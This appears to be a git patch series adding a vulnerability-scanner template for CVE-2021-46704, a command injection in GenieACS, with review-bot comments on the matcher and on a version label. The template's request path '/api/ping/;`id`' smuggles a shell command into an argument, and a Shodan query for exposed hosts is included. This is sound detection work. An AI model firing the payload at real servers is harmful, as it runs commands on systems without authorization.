From d865251122d83164f216954ffb7d1b576432700e Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Thu, 22 Jun 2023 01:33:09 +0530
Subject: [PATCH 1/3] Create CVE-2021-46704.yaml
---
 http/cves/2021/CVE-2021-46704.yaml | 43 ++++++++++++++++++++++++++++++
 1 file changed, 43 insertions(+)
 create mode 100644 http/cves/2021/CVE-2021-46704.yaml
diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml
new file mode 100644
index 0000000000..d8a81ef049
--- /dev/null
+++ b/http/cves/2021/CVE-2021-46704.yaml
@@ -0,0 +1,43 @@
+id: CVE-2021-46704
+
+info:
+ name: GenieACS - OS Command Injection
+ author: DhiyaneshDK
+ severity: critical
+ description: |
+ In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check.
+ reference:
+ - https://twitter.com/shaybt12/status/1671598239835906058
+ - https://github.com/advisories/GHSA-2877-693q-pj33
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-46704
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-46704
+ cwe-id: CWE-78
+ metadata:
+ max-request: 1
+ verified: "true"
+ shodan-query: http.favicon.hash:-2098066288
+ tags: cve,cve2021,genieacs
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/api/ping/;`id`"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "uid=([0-9]+)"
+
+ - type: word
+ part: header
+ words:
+ - text/plain
+
+ - type: status
+ status:
+ - 500
From 1eec2caba1fce64f8f02d6724fb722485c41f1a9 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Thu, 22 Jun 2023 01:43:37 +0530
Subject: [PATCH 2/3] trail space fix
---
 http/cves/2021/CVE-2021-46704.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
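Review bot: The body matcher added in PATCH 1/3, `- "uid=([0-9]+)"`, accepts any response that contains `uid=` followed by digits, so a 500 page that happens to print such a token (a debug dump, a session field) would be reported as a critical finding. If the response carries the complete `id` output, requiring the group field as well, `- "uid=[0-9]+.*gid=[0-9]+"`, makes an accidental match much less likely. The `info` block also has no `remediation` entry; the description already names the fixed release, so `remediation: Upgrade GenieACS to 1.2.8 or later.` would give whoever triages a match the next step.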
diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml index d8a81ef049..35e2266e2d 100644 --- a/http/cves/2021/CVE-2021-46704.yaml +++ b/http/cves/2021/CVE-2021-46704.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-46704 - cwe-id: CWE-78 + cwe-id: CWE-78 metadata: max-request: 1 verified: "true" From 565e5d32de31bd1f773a6b1d59dfb00cadbe7604 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 22 Jun 2023 12:48:18 +0530 Subject: [PATCH 3/3] minor -update --- http/cves/2021/CVE-2021-46704.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml index 35e2266e2d..bdc1db3283 100644 --- a/http/cves/2021/CVE-2021-46704.yaml +++ b/http/cves/2021/CVE-2021-46704.yaml @@ -1,7 +1,7 @@ id: CVE-2021-46704 info: - name: GenieACS - OS Command Injection + name: GenieACS => 1.2.8 - OS Command Injection author: DhiyaneshDK severity: critical description: | @@ -19,7 +19,7 @@ info: max-request: 1 verified: "true" shodan-query: http.favicon.hash:-2098066288 - tags: cve,cve2021,genieacs + tags: cve,cve2021,genieacs,rce http: - method: GET
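Review bot: The new title in the first hunk of PATCH 3/3, `name: GenieACS => 1.2.8 - OS Command Injection`, reads as "1.2.8 and later", which is the opposite of the description's "1.2.x before 1.2.8". `name: GenieACS < 1.2.8 - OS Command Injection` matches the description and the linked advisories, and keeps someone triaging a finding from treating the fixed release as the affected one.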